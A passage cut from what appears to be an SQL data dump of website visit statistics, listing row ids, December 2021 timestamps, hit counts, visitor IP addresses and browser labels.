249.64.19','chrome'),(560580,1639040174,1,1,0,0,'66.249.64.19','chrome'),(560581,1639041514,1,0,1,0,'66.249.64.20',''),(560582,1639044437,2,1,1,0,'66.249.64.20',''),(560583,1639046451,1,1,0,0,'91.196.178.169','chrome'),(560584,1639048086,1,1,0,0,'31.13.127.22','other'),(560586,1639048203,2,2,0,0,'69.171.249.13','other'),(560587,1639048700,1,1,0,0,'66.249.64.18','chrome'),(560588,1639049790,5,5,0,0,'159.65.142.178','chrome'),(560589,1639050201,1,0,1,0,'66.249.64.19',''),(560590,1639051488,1,1,0,0,'178.95.134.200','chrome'),(560591,1639065780,1,1,0,0,'46.133.60.199','chrome'),(560592,1639071395,1,1,0,0,'173.252.111.2','other'),(560593,1639071402,1,1,0,0,'173.252.111.4','other'),(560595,1639071629,1,1,0,0,'173.252.111.8','other'),(560596,1639071814,2,2,0,0,'173.252.111.16','other'),(560597,1639077964,1,1,0,0,'66.249.64.18','chrome'),(560598,1639078265,1,1,0,0,'195.10.210.70','other'),(560599,1639078695,1,0,1,0,'66.249.64.20',''),(560600,1639079470,2,2,0,0,'173.252.111.20','other'),(560601,1639079471,1,1,0,0,'173.252.111.11','other'),(560603,1639085535,2,2,0,0,'54.37.75.187','firefox'),(560604,1639086477,1,1,0,0,'157.55.39.180','other'),(560605,1639095453,1,1,0,0,'31.13.103.22','other'),(560606,1639095454,5,5,0,0,'31.13.103.10','other'),(560622,1639095479,1,1,0,0,'31.13.103.12','other'),(560623,1639105252,1,1,0,0,'23.148.145.23','firefox'),(560624,1639107885,2,0,2,0,'66.249.64.18',''),(560625,1639108782,1,0,1,0,'66.249.64.20',''),(560626,1639109063,2,2,0,0,'23.228.109.147','other'),(560627,1639110020,1,1,0,0,'113.96.250.18','other'),(560628,1639110932,7,7,0,0,'87.250.224.172','other'),(560629,1639112481,2,1,1,0,'66.249.64.20',''),(560630,1639114705,1,0,1,0,'66.249.64.18',''),(560631,1639114720,1,1,0,0,'66.249.64.19','chrome'),(560632,1639115146,1,1,0,0,'66.249.64.18','chrome'),(560633,1639115182,2,2,0,0,'66.249.64.20','chrome'),(560634,1639120462,1,0,1,0,'66.249.64.19',''),(560635,1639120471,1,1,0,0,'66.249.64.18','chrome'),(560636,1639120812,1,1,0,0,'66.249.64.19','chrome'),(560637,1639120964,1,0,1,0,'66.249.64.20',''),(560638,1639121064,2,2,0,0,'23.228.109.147','other'),(560639,1639122385,1,1,0,0,'66.249.64.19','chrome'),(560640,1639123598,1,1,0,0,'66.249.64.19','chrome'),(560641,1639123955,1,1,0,0,'66.249.64.18','chrome'),(560642,1639129261,1,1,0,0,'87.250.224.172','other'),(560643,1639129897,1,1,0,0,'23.228.109.147','other'),(560644,1639130994,1,1,0,0,'113.96.250.18','chrome'),(560645,1639140532,1,1,0,0,'173.252.79.17','other'),(560646,1639143181,1,1,0,0,'34.96.130.17','other'),(560647,1639151187,1,1,0,0,'113.96.250.18','chrome'),(560648,1639156389,1,1,0,0,'95.79.192.70','other'),(560649,1639163604,1,1,0,0,'113.96.250.18','other'),(560650,1639168512,1,0,1,0,'66.249.70.69',''),(560651,1639170657,1,1,0,0,'113.96.250.18','other'),(560652,1639174389,1,1,0,0,'64.246.165.170','firefox'),(560653,1639174450,1,1,0,0,'113.96.250.18','chrome'),(560654,1639174989,2,2,0,0,'167.248.133.44','other'),(560655,1639178267,11,11,0,0,'54.224.154.208','chrome'),(560656,1639179253,1,1,0,0,'113.96.250.18','chrome'),(560657,1639181892,1,1,0,0,'92.118.160.57','other'),(560658,1639184278,26,26,0,0,'23.95.227.11','chrome'),(560659,1639191279,1,1,0,0,'66.249.70.73','chrome'),(560660,1639199005,1,1,0,0,'107.190.139.130','firefox'),(560661,1639207980,1,1,0,0,'113.96.250.18','chrome'),(560662,1639210322,1,1,0,0,'113.96.250.18','chrome'),(560663,1639229236,5,5,0,0,'212.227.12.174','chrome'),(560664,1639230355,1,0,1,0,'66.249.70.71',''),(560665,1639236285,1,1,0,0,'113.96.250.18','chrome'),(560666,1639236950,1,1,0,0,'66.249.70.73','chrome'),(560667,1639239876,1,1,0,0,'113.96.250.18','chrome'),(560668,1639241389,1,1,0,0,'113.96.250.18','other'),(560669,1639246538,1,1,0,0,'31.13.127.32','other'),(560670,1639246541,1,1,0,0,'173.252.127.3','other'),(560671,1639250549,1,1,0,0,'23.228.109.147','other'),(560672,1639258024,2,2,0,0,'167.94.138.114','other'),(560673,1639266438,1,1,0,0,'113.96.250.18','firefox'),(560674,1639267986,1,0,1,0,'66.249.70.69',''),(560675,1639272726,1,1,0,0,'113.96.250.18','chrome'),(560676,1639273738,1,1,0,0,'69.197.185.43','chrome'),(560677,1639277055,1,1,0,0,'92.118.160.13','other'),(560678,1639284963,1,1,0,0,'113.96.250.18','other'),(560679,1639287006,1,1,0,0,'66.249.70.73','chrome'),(560680,1639288269,1,1,0,0,'113.96.250.18','other'),(560681,1639292206,1,1,0,0,'113.96.250.18','other'),(560682,1639303919,1,1,0,0,'113.96.250.18','chrome'),(560683,1639307817,1,1,0,0,'113.96.250.18','other'),(560684,1639314983,1,0,1,0,'66.249.70.69',''),(560685,1639317121,1,1,0,0,'13.76.132.231','firefox'),(560686,1639321700,2,2,0,0,'113.96.250.18','chrome'),(560687,1639321729,1,1,0,0,'185.237.217.11','chrome'),(560688,1639323993,1,1,0,0,'185.237.217.11','chrome'),(560689,1639324552,1,1,0,0,'52.146.13.190','chrome'),(560690,1639325335,1,1,0,0,'113.96.250.18','other'),(560691,1639329955,2,2,0,0,'40.88.140.60','firefox'),(560692,1639330788,1,1,0,0,'113.96.250.18','chrome'),(560693,1639342690,1,1,0,0,'113.96.250.18','chrome'),(560694,1639345167,1,1,0,0,'74.125.151.73','other'),(560695,1639349726,1,1,0,0,'157.55.39.156','other'),(560696,1639356865,1,1,0,0,'113.96.250.18','chrome'),(560697,1639362165,2,2,0,0,'104.219.251.41','chrome'),(560698,1639363028,2,2,0,0,'113.96.250.18','chrome'),(560699,1639365270,1,1,0,0,'113.96.250.18','other'),(560700,1639370111,1,1,0,0,'113.96.250.18','chrome'),(560701,1639382671,1,1,0,0,'23.228.109.147','other'),(560702,1639399646,1,1,0,0,'66.249.70.73','chrome'),(560703,1639401398,1,0,1,0,'66.249.70.69',''),(560704,1639403804,1,1,0,0,'157.55.39.156','other'),(560705,1639408468,1,0,1,0,'66.249.70.73',''),(560706,1639418908,1,1,0,0,'157.55.39.174','other'),(560707,1639429822,1,1,0,0,'66.249.70.69','chrome'),(560708,1639433314,2,2,0,0,'173.252.111.14','other'),(560709,1639438247,2,2,0,0,'31.13.127.118','other'),(560711,1639438248,1,1,0,0,'31.13.127.36','other'),(560714,1639443077,2,2,0,0,'5.45.66.98','chrome'),(560715,1639444461,1,1,0,0,'173.252.79.8','other'),(560716,1639446533,2,2,0,0,'5.45.66.98','chrome'),(560717,1639451219,2,2,0,0,'62.210.178.249','chrome'),(560718,1639452463,2,2,0,0,'62.210.178.249','chrome'),(560719,1639458317,2,2,0,0,'37.252.15.44','chrome'),(560720,1639461744,1,1,0,0,'157.55.39.180','other'),(560721,1639467952,1,1,0,0,'95.79.132.252','other'),(560722,1639467984,2,0,2,0,'66.249.70.69',''),(560723,1639472156,1,1,0,0,'52.90.93.102','other'),(560724,1639477433,1,1,0,0,'157.55.39.108','other'),(560725,1639479288,2,2,0,0,'205.185.122.184','chrome'),(560726,1639480434,2,2,0,0,'5.45.66.98','chrome'),(560727,1639483702,1,1,0,0,'31.13.127.38','other'),(560728,1639483703,2,2,0,0,'31.13.127.28','other'),(560729,1639483750,1,1,0,0,'31.13.103.19','other'),(560730,1639483753,1,1,0,0,'31.13.127.8','other'),(560731,1639483781,1,1,0,0,'31.13.127.118','other'),(560734,1639483782,2,2,0,0,'31.13.127.111','other'),(560738,1639486039,2,2,0,0,'5.45.74.217','chrome'),(560739,1639497020,1,1,0,0,'20.94.197.34','chrome'),(560740,1639501010,1,0,1,0,'66.249.70.73',''),(560741,1639505942,1,1,0,0,'91.196.178.194','chrome'),(560742,1639507734,1,1,0,0,'35.180.15.198','firefox'),(560743,1639515515,1,1,0,0,'23.228.109.147','other'),(560744,1639529587,1,1,0,0,'34.86.35.20','other'),(560745,1639558796,1,0,1,0,'66.249.70.71',''),(560746,1639558799,1,0,1,0,'66.249.70.69',''),(560747,1639563298,1,1,0,0,'91.196.178.169','chrome'),(560748,1639563630,1,1,0,0,'31.13.103.119','other'),(560749,1639563631,1,1,0,0,'31.13.103.20','other'),(560750,1639574215,1,0,1,0,'66.249.66.197',''),(560751,1639576571,1,1,0,0,'91.196.178.169','chrome'),(560752,1639582691,1,1,0,0,'91.196.178.169','chrome'),(560753,1639582713,1,1,0,0,'31.13.127.39','other'),(560754,1639582714,1,1,0,0,'31.13.127.41','other'),(560755,1639582716,1,1,0,0,'31.13.127.22','other'),(560756,1639582717,1,1,0,0,'31.13.127.23','other'),(560757,1639582723,1,1,0,0,'31.13.127.34','other'),(560758,1639582725,1,1,0,0,'31.13.127.119','other'),(560759,1639582726,1,1,0,0,'31.13.127.116','other'),(560760,1639582728,2,2,0,0,'31.13.127.1','other'),(560761,1639583787,1,1,0,0,'66.249.66.158','chrome'),(560762,1639585179,1,1,0,0,'66.249.66.199','chrome'),(560763,1639585755,1,0,1,0,'66.249.66.159',''),(560764,1639595281,1,1,0,0,'91.196.178.194','chrome'),(560765,1639595303,1,1,0,0,'173.252.107.9','other'),(560766,1639596452,1,1,0,0,'185.237.217.11','chrome'),(560767,1639597112,1,0,1,0,'66.249.66.159',''),(560768,1639597864,1,1,0,0,'185.237.217.11','chrome'),(560769,1639600618,1,1,0,0,'91.196.178.209','chrome'),(560770,1639603751,1,1,0,0,'185.237.217.10','chrome'),(560771,1639612435,1,0,1,0,'66.249.66.23',''),(560772,1639615559,1,1,0,0,'66.249.66.197','chrome'),(560773,1639631609,1,1,0,0,'157.55.39.156','other'),(560774,1639649044,1,0,1,0,'66.249.66.158',''),(560775,1639651304,1,0,1,0,'66.249.70.71',''),(560776,1639653638,26,26,0,0,'192.3.1.131','chrome'),(560777,1639660068,1,1,0,0,'31.13.127.15','other'),(560778,1639661428,1,1,0,0,'23.228.109.147','other'),(560779,1639670542,1,1,0,0,'40.125.67.32','chrome'),(560780,1639692940,1,1,0,0,'34.77.162.29','other'),(560781,1639706426,2,2,0,0,'23.228.109.147','other'),(560782,1639712014,2,2,0,0,'23.228.109.147','other'),(560783,1639713011,1,1,0,0,'66.249.70.73','chrome'),(560784,1639719360,1,1,0,0,'185.237.217.11','chrome'),(560785,1639722710,1,1,0,0,'46.211.27.35','other'),(560786,1639722713,1,1,0,0,'31.13.127.40','other'),(560787,1639722714,2,2,0,0,'31.13.127.5','other'),(560791,1639722715,1,1,0,0,'31.13.127.24','other'),(560793,1639733380,1,1,0,0,'46.211.114.100','chrome'),(560794,1639736265,1,0,1,0,'66.249.70.69',''),(560795,1639738902,1,1,0,0,'95.79.124.167','other'),(560796,1639741149,1,1,0,0,'185.81.96.5','firefox'),(560797,1639743935,1,1,0,0,'31.13.127.27','other'),(560798,1639743936,1,1,0,0,'31.13.127.9','other'),(560799,1639756712,2,2,0,0,'205.185.122.184','chrome'),(560800,1639760429,1,1,0,0,'157.55.39.161','other'),(560801,1639762785,1,1,0,0,'66.249.70.73','chrome'),(560802,1639772693,1,0,1,0,'66.249.70.71',''),(560803,1639775421,1,1,0,0,'148.66.129.183','firefox'),(560804,1639782026,1,1,0,0,'45.90.219.64','firefox'),(560805,1639787612,1,1,0,0,'157.55.39.180','other'),(560806,1639800236,11,11,0,0,'35.86.209.158','chrome'),(560807,1639805843,2,2,0,0,'41.251.23.120','chrome'),(560808,1639822531,1,0,1,0,'66.249.70.71',''),(560809,1639838436,1,1,0,0,'91.196.178.196','chrome'),(560810,1639839108,1,1,0,0,'23.228.109.147','other'),(560811,1639839554,1,1,0,0,'91.196.178.196','chrome'),(560812,1639841341,1,1,0,0,'91.196.178.194','chrome'),(560813,1639850090,1,1,0,0,'66.249.70.71','chrome'),(560814,1639850205,3,3,0,0,'34.64.218.102','firefox'),(560815,1639851529,1,0,1,0,'66.249.70.69',''),(560816,1639872359,1,1,0,0,'159.89.34.134','chrome'),(560817,1639879314,2,2,0,0,'41.251.23.149','chrome'),(560818,1639882087,2,2,0,0,'23.228.109.147','other'),(560819,1639889863,1,1,0,0,'77.68.27.144','firefox'),(560820,1639891739,1,1,0,0,'157.230.252.198','chrome'),(560821,1639898285,2,2,0,0,'23.228.109.147','other'),(560822,1639906337,2,2,0,0,'23.228.109.147','other'),(560823,1639918260,1,1,0,0,'159.223.44.75','chrome'),(560824,1639921154,1,1,0,0,'91.196.178.197','chrome'),(560825,1639922307,1,1,0,0,'92.118.160.9','other'),(560826,1639922735,3,3,0,0,'20.94.197.34','other'),(560827,1639923132,2,2,0,0,'31.13.127.34','other'),(560828,1639924386,1,0,1,0,'66.249.70.73',''),(560829,1639925936,1,1,0,0,'46.96.145.75','firefox'),(560830,1639946252,1,1,0,0,'74.125.151.67','chrome'),(560831,1639955779,1,1,0,0,'66.249.70.73','chrome'),(560832,1639984290,1,0,1,0,'66.249.70.73',''),(560833,1639984466,1,1,0,0,'159.65.131.221','firefox'),(560834,1639986647,1,0,1,0,'66.249.70.71',''),(560835,1639989030,1,1,0,0,'179.43.169.181','firefox'),(560836,1639989036,1,1,0,0,'65.154.226.165','chrome'),(560837,1639989072,1,1,0,0,'205.169.39.15','chrome'),(560838,1639989459,1,1,0,0,'95.79.135.231','other'),(560839,1639992405,1,1,0,0,'179.43.169.181','firefox'),(560840,1639992440,1,1,0,0,'65.154.226.109','chrome'),(560841,1640016384,1,1,0,0,'66.249.83.86','chrome'),(560842,1640020772,1,1,0,0,'95.79.222.63','other'),(560843,1640023827,2,2,0,0,'89.104.111.109','chrome'),(560844,1640029148,2,2,0,0,'89.104.111.91','chrome'),(560845,1640036865,1,1,0,0,'20.126.123.171','firefox'),(560846,1640055127,2,2,0,0,'176.53.217.196','chrome'),(560847,1640056479,2,2,0,0,'176.53.217.21','chrome'),(560848,1640059169,1,1,0,0,'66.249.70.69','chrome'),(560849,1640059330,2,2,0,0,'205.169.39.143','chrome'),(560850,1640070268,1,0,1,0,'66.249.70.71',''),(560851,1640081197,1,1,0,0,'95.79.127.222','other'),(560852,1640093212,1,1,0,0,'91.196.178.169','chrome'),(560853,1640094667,1,0,1,0,'66.249.70.71',''),(560854,1640098347,1,1,0,0,'66.249.70.71','chrome'),(560855,1640100250,1,1,0,0,'66.249.70.73','chrome'),(560856,1640103462,3,3,0,0,'31.13.127.37','other'),(560857,1640103463,1,1,0,0,'31.13.127.1','other'),(560860,1640103464,1,1,0,0,'31.13.127.12','other'),(560862,1640107106,3,3,0,0,'47.243.169.70','other'),(560863,1640107110,1,1,0,0,'47.243.169.70','chrome'),(560864,1640111063,2,2,0,0,'45.90.63.198','chrome'),(560865,1640115630,1,1,0,0,'66.249.70.69','chrome'),(560866,1640115652,1,1,0,0,'69.197.185.46','chrome'),(560867,1640117058,2,2,0,0,'176.53.220.208','chrome'),(560868,1640121848,1,1,0,0,'113.96.250.18','chrome'),(560869,1640125803,1,1,0,0,'173.252.107.8','other'),(560870,1640126176,1,1,0,0,'117.102.69.146','msie'),(560871,1640135151,1,1,0,0,'113.96.250.18','chrome'),(560872,1640141162,1,1,0,0,'47.243.230.55','chrome'),(560873,1640141167,2,2,0,0,'47.243.230.55','other'),(560874,1640141490,2,2,0,0,'176.113.43.112','chrome'),(560875,1640142818,2,2,0,0,'176.53.221.73','chrome'),(560876,1640144257,1,1,0,0,'173.252.79.28','other'),(560877,1640146778,1,1,0,0,'113.96.250.18','other'),(560878,1640150454,1,1,0,0,'113.96.250.18','chrome'),(560879,1640154331,2,2,0,0,'113.96.250.18','chrome'),(560880,1640157593,1,1,0,0,'113.96.250.18','chrome'),(560881,1640158373,1,0,1,0,'66.249.70.69',''),(560882,1640160824,1,1,0,0,'95.79.125.55','other'),(560883,1640163379,1,1,0,0,'157.55.39.161','other'),(560884,1640170931,1,1,0,0,'91.196.178.169','chrome'),(560885,1640179500,1,1,0,0,'113.96.250.18','other'),(560886,1640183113,1,1,0,0,'113.96.250.18','chrome'),(560887,1640185979,3,3,0,0,'113.96.250.18','chrome'),(560888,1640190633,1,1,0,0,'66.249.70.73','chrome'),(560889,1640190769,1,1,0,0,'66.249.70.69','chrome'),(560890,1640191179,1,1,0,0,'113.96.250.18','other'),(560891,1640203705,1,1,0,0,'113.96.250.18','chrome'),(560892,1640208224,1,1,0,0,'113.96.250.18','chrome'),(560893,1640210987,1,1,0,0,'113.96.250.18','other'),(560894,1640211212,1,1,0,0,'113.96.250.18','chrome'),(560895,1640212002,1,0,1,0,'66.249.70.73',''),(560896,1640220639,1,0,1,0,'66.249.70.69',''),(560897,1640221881,1,1,0,0,'113.96.250.18','msie'),(560898,1640224855,1,1,0,0,'66.249.70.69','chrome'),(560899,1640225144,1,0,1,0,'66.249.70.71',''),(560900,1640225551,1,1,0,0,'66.249.70.73','chrome'),(560901,1640227513,2,2,0,0,'176.113.42.243','chrome'),(560902,1640228821,2,2,0,0,'45.90.62.103','chrome'),(560903,1640232699,1,1,0,0,'66.249.70.71','chrome'),(560904,1640236979,2,2,0,0,'113.96.250.18','chrome'),(560905,1640237624,1,1,0,0,'31.13.103.6','other'),(560906,1640237780,1,1,0,0,'31.13.103.20','other'),(560907,1640238454,2,2,0,0,'66.249.70.71','chrome'),(560908,1640242330,1,1,0,0,'66.249.70.71','chrome'),(560909,1640244877,1,0,1,0,'66.249.70.73',''),(560910,1640247317,1,1,0,0,'51.158.127.119','other'),(560911,1640247768,1,1,0,0,'113.96.250.18','chrome'),(560912,1640247854,1,1,0,0,'113.96.250.18','firefox'),(560913,1640249398,1,1,0,0,'113.96.250.18','chrome'),(560914,1640263699,1,1,0,0,'113.96.250.18','chrome'),(560915,1640267515,1,0,1,0,'66.249.70.73',''),(560916,1640268797,2,2,0,0,'113.96.250.18','chrome'),(560917,1640272193,1,1,0,0,'164.68.119.88','firefox'),(560918,1640274560,2,2,0,0,'113.96.250.18','other'),(560919,1640276070,4,4,0,0,'113.96.250.18','chrome'),(560920,1640278522,1,0,1,0,'66.249.70.71',''),(560921,1640282073,1,1,0,0,'66.249.70.73','chrome'),(560922,1640282576,1,1,0,0,'66.249.70.71','chrome'),(560923,1640282757,1,1,0,0,'173.252.111.6','other'),(560924,1640285117,1,1,0,0,'173.252.111.14','other'),(560925,1640285118,1,1,0,0,'173.252.111.20','other'),(560926,1640288274,1,1,0,0,'69.171.249.8','other'),(560927,1640288275,1,1,0,0,'69.171.249.15','other'),(560928,1640288276,1,1,0,0,'69.171.249.17','other'),(560929,1640303921,1,1,0,0,'113.96.250.18','chrome'),(560930,1640309219,1,0,1,0,'66.249.70.71',''),(560931,1640310631,1,1,0,0,'66.249.70.73','chrome'),(560932,1640311835,1,0,1,0,'66.249.70.73',''),(560933,1640315133,1,0,1,0,'66.249.70.73',''),(560934,1640317188,1,1,0,0,'113.96.250.18','chrome'),(560935,1640319985,1,1,0,0,'113.96.250.18','opera'),(560936,1640323441,1,1,0,0,'24.21.80.164','msie'),(560937,1640323451,2,2,0,0,'159.65.76.209','chrome'),(560938,1640324218,1,1,0,0,'113.96.250.18','other'),(560939,1640326400,1,1,0,0,'31.13.127.117','other'),(560940,1640326401,1,1,0,0,'31.13.127.18','other'),(560941,1640326502,1,1,0,0,'113.96.250.18','other'),(560942,1640327380,2,2,0,0,'113.96.250.18','chrome'),(560943,1640328254,1,1,0,0,'173.252.79.6','other'),(560944,1640328742,1,1,0,0,'66.249.70.71','chrome'),(560945,1640335110,1,1,0,0,'113.96.250.18','other'),(560946,1640345727,1,0,1,0,'66.249.70.69',''),(560947,1640345773,1,1,0,0,'66.249.70.69','chrome'),(560948,1640350740,1,1,0,0,'54.191.253.13','chrome'),(560949,1640353193,1,1,0,0,'113.96.250.18','chrome'),(560950,1640354681,1,0,1,0,'66.249.70.73',''),(560951,1640365193,1,1,0,0,'34.245.173.158','other'),(560952,1640365366,2,2,0,0,'113.96.250.18','chrome'),(560953,1640366005,1,1,0,0,'66.249.70.69','chrome'),(560954,1640371493,1,1,0,0,'113.96.250.18','chrome'),(560955,1640373278,1,1,0,0,'23.228.70.82','other'),(560956,1640374102,1,1,0,0,'113.96.250.18','msie'),(560957,1640389497,1,1,0,0,'113.96.250.18','chrome'),(560958,1640400462,1,0,1,0,'66.249.70.71',''),(560959,1640401422,1,1,0,0,'66.249.70.71','chrome'),(560960,1640407563,1,1,0,0,'113.96.250.18','chrome'),(560961,1640411613,1,1,0,0,'113.96.250.18','chrome'),(560962,1640413444,1,1,0,0,'113.96.250.18','chrome'),(560963,1640414474,1,1,0,0,'157.55.39.12','other'),(560964,1640417087,1,1,0,0,'185.237.217.11','chrome'),(560965,1640419747,1,1,0,0,'65.108.81.126','chrome'),(560966,1640421667,1,1,0,0,'94.158.179.123','chrome'),(560967,1640422166,1,1,0,0,'66.249.70.69','chrome'),(560968,1640427840,1,1,0,0,'113.96.250.18','other'),(560969,1640429327,3,3,0,0,'128.234.154.223','other'),(560970,1640433965,1,1,0,0,'23.228.70.82','other'),(560971,1640434643,1,1,0,0,'91.196.177.20','chrome'),(560972,1640435869,2,2,0,0,'113.96.250.18','chrome'),(560973,1640437320,1,1,0,0,'157.230.246.7','firefox'),(560974,1640438482,1,1,0,0,'43.240.8.39','firefox'),(560975,1640441087,1,0,1,0,'66.249.70.71',''),(560976,1640441164,4,4,0,0,'113.96.250.18','other'),(560977,1640442344,3,3,0,0,'113.96.250.18','chrome'),(560978,1640444953,4,4,0,0,'109.70.111.112','chrome'),(560979,1640446353,1,1,0,0,'91.196.178.62','chrome'),(560980,1640451509,1,1,0,0,'113.96.250.18','chrome'),(560981,1640454322,1,1,0,0,'69.197.185.46','chrome'),(560982,1640464303,2,2,0,0,'209.141.36.231','chrome'),(560983,1640470432,1,1,0,0,'113.96.250.18','other'),(560984,1640473545,1,1,0,0,'113.96.250.18','chrome'),(560985,1640474892,1,1,0,0,'111.88.211.174','msie'),(560986,1640475266,1,1,0,0,'113.96.250.18','other'),(560987,1640493922,1,1,0,0,'66.249.70.69','chrome'),(560988,1640496266,1,1,0,0,'113.96.250.18','chrome'),(560989,1640497367,1,1,0,0,'113.96.250.18','chrome'),(560990,1640501558,1,1,0,0,'113.96.250.18','chrome'),(560991,1640505726,1,1,0,0,'194.156.95.209','chrome'),(560992,1640505727,1,1,0,0,'194.156.95.209','opera'),(560993,1640506865,1,1,0,0,'113.96.250.18','other'),(560994,1640527719,1,1,0,0,'31.13.127.13','other'),(560995,1640528241,1,0,1,0,'66.249.66.9',''),(560996,1640529687,1,1,0,0,'95.79.87.39','other'),(560997,1640536450,1,1,0,0,'23.228.70.82','other'),(560998,1640537959,1,1,0,0,'113.96.250.18','chrome'),(560999,1640540042,1,0,1,0,'66.249.66.199',''),(561000,1640547130,1,1,0,0,'113.96.250.18','other'),(561001,1640550221,1,1,0,0,'34.222.60.220','chrome'),(561002,1640552949,1,1,0,0,'113.96.250.18','other'),(561003,1640553325,1,1,0,0,'113.96.250.18','chrome'),(561004,1640561819,1,1,0,0,'113.96.250.18','opera'),(561005,1640568130,1,1,0,0,'113.96.250.18','chrome'),(561006,1640570420,1,1,0,0,'31.13.103.7','other'),(561007,1640572387,5,5,0,0,'128.199.224.33','chrome'),(561008,1640580785,1,1,0,0,'113.96.250.18','msie'),(561009,1640581615,1,1,0,0,'113.255.29.118','msie'),(561010,1640587917,1,0,1,0,'66.249.66.9',''),(561011,1640589876,2,2,0,0,'113.96.250.18','firefox'),(561012,1640595841,1,1,0,0,'113.96.250.18','chrome'),(561013,1640596728,1,1,0,0,'113.96.250.18','other'),(561014,1640598296,1,1,0,0,'185.7.145.88','chrome'),(561015,1640605029,1,1,0,0,'113.96.250.18','other'),(561016,1640624163,1,0,1,0,'113.96.250.18',''),(561017,1640625440,1,0,1,0,'66.249.66.199',''),(561018,1640625724,1,1,0,0,'113.96.250.18','other'),(561019,1640626561,1,1,0,0,'91.196.178.139','chrome'),(561020,1640641846,1,1,0,0,'161.35.210.101','firefox'),(561021,1640644087,1,1,0,0,'66.249.66.129','chrome'),(561022,1640653475,1,1,0,0,'66.249.66.159','chrome'),(561023,1640653684,1,1,0,0,'113.96.250.18','chrome'),(561024,1640656334,1,0,1,0,'66.249.66.201',''),(561025,1640656835,1,1,0,0,'113.96.250.18','chrome'),(561026,1640661512,1,1,0,0,'34.96.130.27','other'),(561027,1640666353,1,1,0,0,'113.96.250.18','chrome'),(561028,1640677713,1,1,0,0,'23.228.70.82','other'),(561029,1640681904,1,1,0,0,'182.53.205.41','msie'),(561030,1640686053,2,2,0,0,'186.13.40.120','chrome'),(561031,1640688403,1,1,0,0,'128.199.78.183','chrome'),(561032,1640691505,1,1,0,0,'113.96.250.18','chrome'),(561033,1640692934,1,1,0,0,'113.96.250.18','other'),(561034,1640695531,1,1,0,0,'113.96.250.18','chrome'),(561035,1640696315,1,1,0,0,'157.55.39.12','other'),(561036,1640703032,1,1,0,0,'113.96.250.18','chrome'),(561037,1640706312,1,1,0,0,'113.96.250.18','other'),(561038,1640711100,1,0,1,0,'66.249.70.71',''),(561039,1640714721,1,1,0,0,'46.133.25.211','chrome'),(561040,1640719074,1,1,0,0,'113.96.250.18','other'),(561041,1640722412,5,5,0,0,'52.161.65.242','other'),(561042,1640728751,1,1,0,0,'45.129.18.28','chrome'),(561043,1640734114,1,1,0,0,'51.158.108.77','other'),(561044,1640736797,5,5,0,0,'128.199.224.33','chrome'),(561045,1640738082,1,1,0,0,'113.96.250.18','chrome'),(561046,1640741730,1,1,0,0,'113.96.250.18','chrome'),(561047,1640749431,1,1,0,0,'113.96.250.18','other'),(561048,1640752369,1,1,0,0,'80.253.246.193','firefox'),(561049,1640755783,1,1,0,0,'45.90.219.64','firefox'),(561050,1640757382,1,0,1,0,'113.96.250.18',''),(561051,1640762858,1,1,0,0,'113.96.250.18','chrome'),(561052,1640769162,8,8,0,0,'203.159.94.116','chrome'),(561053,1640776892,1,1,0,0,'113.96.250.18','chrome'),(561054,1640784459,1,1,0,0,'113.96.250.18','chrome'),(561055,1640787437,1,1,0,0,'95.79.127.201','other'),(561056,1640787814,1,1,0,0,'113.96.250.18','chrome'),(561057,1640791097,1,1,0,0,'66.249.66.86','chrome'),(561058,1640797514,1,0,1,0,'66.249.66.7',''),(561059,1640797517,1,0,1,0,'66.249.66.158',''),(561060,1640800319,1,1,0,0,'66.249.66.9','chrome'),(561061,1640800859,1,0,1,0,'66.249.66.199',''),(561062,1640805998,1,1,0,0,'113.96.250.18','chrome'),(561063,1640806141,1,0,1,0,'66.249.66.201',''),(561064,1640807305,1,1,0,0,'173.252.111.18','other'),(561065,1640807306,1,1,0,0,'173.252.111.4','other'),(561066,1640812601,1,1,0,0,'113.96.250.18','chrome'),(561067,1640819621,1,1,0,0,'113.96.250.18','firefox'),(561068,1640824202,1,1,0,0,'116.203.211.5','firefox'),(561069,1640839469,1,1,0,0,'103.251.59.124','msie'),(561070,1640839942,1,0,1,0,'66.249.66.7',''),(561071,1640843845,1,1,0,0,'66.249.66.199','chrome'),(561072,1640844419,1,1,0,0,'113.96.250.18','chrome'),(561073,1640844673,1,1,0,0,'113.96.250.18','opera'),(561074,1640845979,1,1,0,0,'109.70.106.130','other'),(561075,1640846159,1,1,0,0,'113.96.250.18','msie'),(561076,1640847327,1,0,1,0,'66.249.66.201',''),(561077,1640847782,1,0,1,0,'66.249.66.197',''),(561078,1640853207,1,1,0,0,'69.197.185.46','chrome'),(561079,1640857594,1,1,0,0,'95.79.84.117','other'),(561080,1640862875,1,1,0,0,'23.228.70.82','other'),(561081,1640866338,1,1,0,0,'51.158.66.83','other'),(561082,1640867175,1,1,0,0,'113.96.250.18','chrome'),(561083,1640867498,1,1,0,0,'66.249.66.5','chrome'),(561084,1640874046,1,1,0,0,'95.79.84.117','other'),(561085,1640880769,1,1,0,0,'157.55.39.158','other'),(561086,1640882052,1,1,0,0,'66.249.66.85','chrome'),(561087,1640882796,1,1,0,0,'185.7.145.88','chrome'),(561088,1640882880,1,1,0,0,'74.125.208.60','chrome'),(561089,1640882882,1,1,0,0,'95.46.104.137','chrome'),(561090,1640882967,1,1,0,0,'74.125.208.62','chrome'),(561091,1640888409,1,1,0,0,'113.96.250.18','chrome'),(561092,1640890913,1,1,0,0,'50.62.141.188','firefox'),(561093,1640898517,1,1,0,0,'113.96.250.18','other'),(561094,1640904136,1,1,0,0,'113.96.250.18','other'),(561095,1640907258,1,1,0,0,'64.246.161.30','firefox'),(561096,1640917965,1,1,0,0,'66.249.66.129','chrome'),(561097,1640924241,1,0,1,0,'66.249.66.158',''),(561098,1640926443,1,1,0,0,'113.96.250.18','chrome'),(561099,1640928884,2,2,0,0,'113.96.250.18','chrome'),(561100,1640936085,1,1,0,0,'113.96.250.18','other'),(561101,1640938713,1,1,0,0,'91.196.178.169','chrome'),(561102,1640939382,1,1,0,0,'113.96.250.18','chrome'),(561103,1640941005,1,1,0,0,'113.96.250.18','chrome'),(561104,1640948148,1,1,0,0,'66.249.66.158','chrome'),(561105,1640954755,1,1,0,0,'113.96.250.18','firefox'),(561106,1640957567,1,1,0,0,'113.96.250.18','chrome'),(561107,1640961296,1,1,0,0,'113.96.250.18','chrome'),(561108,1640964904,1,1,0,0,'185.237.217.11','chrome'),(561109,1640965053,1,1,0,0,'185.237.217.25','chrome'),(561110,1640965058,1,1,0,0,'173.252.79.117','other'),(561111,1640965059,1,1,0,0,'173.252.79.3','other'),(561118,1640966148,2,2,0,0,'87.250.224.132','other'),(561119,1640970347,1,0,1,0,'66.249.66.159',''),(561120,